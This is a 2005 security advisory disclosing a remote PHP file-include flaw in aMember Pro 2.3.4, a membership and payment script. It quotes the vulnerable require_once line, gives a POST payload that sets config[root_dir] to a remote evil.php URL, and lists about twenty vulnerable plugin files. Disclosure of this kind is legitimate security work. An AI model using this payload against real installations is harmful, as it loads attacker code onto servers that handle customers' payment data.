[NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability
=============================================================================


Software: aMember Pro 2.3.4
Type: Remote PHP File Include Vulnerability
Risk: High

Date: Aug. 16 2005
Vendor: CGI Central


Credit:
=======
NewAngels Team with special note of 4Degrees.


Description:
============
"aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually."
[http://www.amember.com/]


PHP Requirements:
=================
register_globals = On


Vulnerability:
==============
Source:
>global $config;
>[...]
>require_once($config['root_dir']."...somestring...");




Exploitation:
=============
This vulnerability exists in several files, the code is not exactly the same in all files.
But the exploit does remain the same.

Example: http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php
POST: config[root_dir]=http://www.46and2.com/evil.php?

Vulnerable Files:
/aMember/plugins/db/mysql/mysql.inc.php
/aMember/plugins/payment/efsnet/efsnet.inc.php
/aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php
/aMember/plugins/payment/cdg/cdg.inc.php
/aMember/plugins/payment/compuworld/compuworld.inc.php
/aMember/plugins/payment/directone/directone.inc.php
/aMember/plugins/payment/authorize_aim/authorize_aim.inc.php
/aMember/plugins/payment/beanstream/beanstream.inc.php
/aMember/plugins/payment/echo/config.inc.php
/aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php
/aMember/plugins/payment/eway/eway.inc.php
/aMember/plugins/payment/linkpoint/linkpoint.inc.php
/aMember/plugins/payment/logiccommerce/logiccommerce.inc.php
/aMember/plugins/payment/netbilling/netbilling.inc.php
/aMember/plugins/payment/payflow_pro/payflow_pro.inc.php
/aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php
/aMember/plugins/payment/payos/payos.inc.php
/aMember/plugins/payment/payready/payready.inc.php
/aMember/plugins/payment/plugnplay/plugnplay.inc.php